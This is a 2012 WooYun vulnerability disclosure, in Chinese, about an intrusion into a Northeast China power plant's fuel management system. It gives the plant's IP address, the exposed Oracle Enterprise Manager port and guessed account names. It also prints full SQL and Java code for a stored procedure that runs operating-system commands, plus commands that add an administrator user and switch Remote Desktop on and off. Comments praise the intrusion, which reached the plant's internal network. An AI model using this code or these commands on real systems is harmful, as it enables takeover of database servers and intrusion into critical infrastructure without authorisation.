当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06127

漏洞标题:东北电网某主力调峰电厂燃料管理系统

相关厂商:中国电力投资集团

漏洞作者: shine

提交时间:2012-04-16 19:51

修复时间:2012-05-31 19:52

公开时间:2012-05-31 19:52

漏洞类型:重要敏感信息泄露

危害等级:低

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-04-16: 细节已通知厂商并且等待厂商处理中
2012-04-16: 厂商已经确认,细节仅向厂商公开
2012-04-26: 细节向核心白帽子及相关领域专家公开
2012-05-06: 细节向普通白帽子公开
2012-05-16: 细节向实习白帽子公开
2012-05-31: 细节向公众公开

简要描述:

一个Oracle渗透的小例子!

详细说明:

阜新发电厂,国家大型企业,是东北电网主力调峰电厂,其发电企业燃料管理系统多处敏感信息、端口等暴露
遍历暴露数据库用户名及密码信息,不过密码好象都不对,但轻松就被猜解了:
http://202.107.80.11







Oracle Enterprise Manager端口暴露,轻松猜解的帐号:
fxrmis
cpicrmis
system
fxrmis
http://202.107.80.11:1158/em/




漏洞证明:


*乌云编辑框伸缩功能不错(好象有个小bug)!^-^

然后,利用这组system权限进行exec操作系统帐号添加及提权等命令操作:
system
fxrmis


利用sqlplus古老的入侵方式
进行java对象创建;函数创建;过程创建


a.sql

create or replace and compile
java souRCe named "util"
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
RC = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
RC = -1;
}
finally
{
return RC;
}
}
}


b.sql

create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';


c.sql

create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;


如图:


然后,进行参数设置、授权、帐号添加、提权、远程桌面注册表开启及关闭等命令操作

variable x number;
set serveroutput on;
exec dbms_java.set_output(100000);
grant javasyspriv to system;
grant javauserpriv to system;
exec :x:=run_cmz('net user shine 123456 /add');
exec :x:=run_cmz('net localgroup administrators shine /add');
exec :x:=run_cmz('REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f');
exec :x:=run_cmz('REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f');


如图:



然后,就是内网,大约有103台左右的主机(只数了一遍)


如图:




修复方案:

以上操作以基本还原到以前的状态,基本无信息修改而造成数据破坏!
(CNCERT/CNVD可不可以搞个多少证书后,发个类似带加"V"标志的证书,以增加白帽子的积极性!)

版权声明:转载请注明来源 shine@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-04-16 20:52

厂商回复:

CNVD确认漏洞并复现部分情况(时间关系)。漏洞事件涉事单位级别较高,待请示主管部门领导后再行协调处置。
对该漏洞评分如下:
CVSS评分:(AV:R/AC:L/Au:NR/C:C/A:C/I:C/B:N) Score:10.00(最高10分,高危)
即:远程攻击、攻击难度低、不需要用户认证,对机密性、完整性、可用性造成完全影响。
技术难度系数:1.1(一般,不过Shine同学的脚本用得挺溜,值得学习)
影响危害系数:1.8(严重,涉及重要信息系统部门单位业务系统,不过从信息系统应用情况看,应该不是工业以太网区域)
综合评分:10.00*1.1*1.8=19.8
关于这个漏洞为什么给这么高rank?有以下几个原因:1、从渗透测试角度讲,取得系统主机控制权并且能还原,这也是白帽子精神的技术注解;2、涉事单位为重要信息系统,从内部网络渗透情况看,涉及部分生产环节。
wooyun的价值在这一漏洞事件上可以得到充分体现。响应Shine的建议,对于加V的做法,也许一些白帽子还存在顾虑,不过从自律的角度看,我想会越来越多的出现勇于加V的白帽子。

最新状态:

暂无


漏洞评价:

评论

  1. 2012-04-16 19:54 | 蓝风 ( 普通白帽子 | Rank:125 漏洞数:25 | 崬汸慾哓 嗼檤焄垳皁 沓猵圊屾亾沬荖 颩憬...)

    人家不都是用的内网么

  2. 2012-04-16 20:43 | cncert国家互联网应急中心(乌云厂商)

    这个集团的副总,李小L...

  3. 2012-04-16 21:01 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    @cncert国家互联网应急中心 ...,是前总理及前全国人大常委会委员长的女儿?晕死!没把这个因素考虑进去,要是能给乌云拉点投资来就好了,哥走远也值了!荆柯兄待步...

  4. 2012-04-16 21:34 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    神马叫加V...

  5. 2012-04-16 21:37 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    实名制么,亲,反正你们有了资料了。我同意加V。

  6. 2012-04-16 21:40 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    这事,想起太平洋彼彼岸的案例,一白帽子认为美国国土安全局对某事(http://t.cn/SyUTVc )表现出“低估对关键设施发动网络攻击的威胁程度”,就渗透得克萨斯州南休斯顿的供水工控系统,并截图公开(http://t.cn/SLdacx )

  7. 2012-04-17 10:14 | 夜莺 ( 路人 | Rank:10 漏洞数:1 | C python)

    远程攻击、攻击难度低、不需要用户认证,对机密性、完整性、可用性造成完全影响又涉及部分生产环节太恐怖了吧

  8. 2012-04-17 10:48 | 三叶草 ( 路人 | Rank:14 漏洞数:5 | 幸福是靠自己努力的)

    加V啊//你们大牛可以,资料网上都有滴,在哪里上班也有滴,是我等仰望羡慕嫉妒恨的对象啊!//俺还是混出名堂来再加,否则太丢人了//

  9. 2012-04-17 15:51 | zmx ( 实习白帽子 | Rank:70 漏洞数:9 | wooyun)

    @shine 哥,吓我一跳。。。标题写错了吧。中电投和东北电网不是一家的。。。

  10. 2012-04-17 15:56 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    @zmx 没写错了!标题是描述的(那个东北电网不是指厂商,是说的电网系统的地域划分)。^-^

  11. 2012-04-17 15:59 | zmx ( 实习白帽子 | Rank:70 漏洞数:9 | wooyun)

    @shine 已经电话咨询了cncert,放心了^-^

  12. 2012-04-18 08:52 | Z-0ne 认证白帽子 ( 普通白帽子 | Rank:559 漏洞数:38 | 目前专注于工控安全基础研究,工业数据采集...)

    今晚也发个某风电系统的问题,来爆爆RANK

  13. 2012-04-18 10:23 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    @Z-0ne 鼓励你!注意测试尺度就是,别乱搞。核电站的也会跟上

  14. 2012-05-31 20:57 | piaoye ( 普通白帽子 | Rank:343 漏洞数:53 | ww)

    这是在乌云见过影响最严重的case,各位大牛小生领教了!

  15. 2012-08-13 09:22 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    好好呀 在后面默默学习...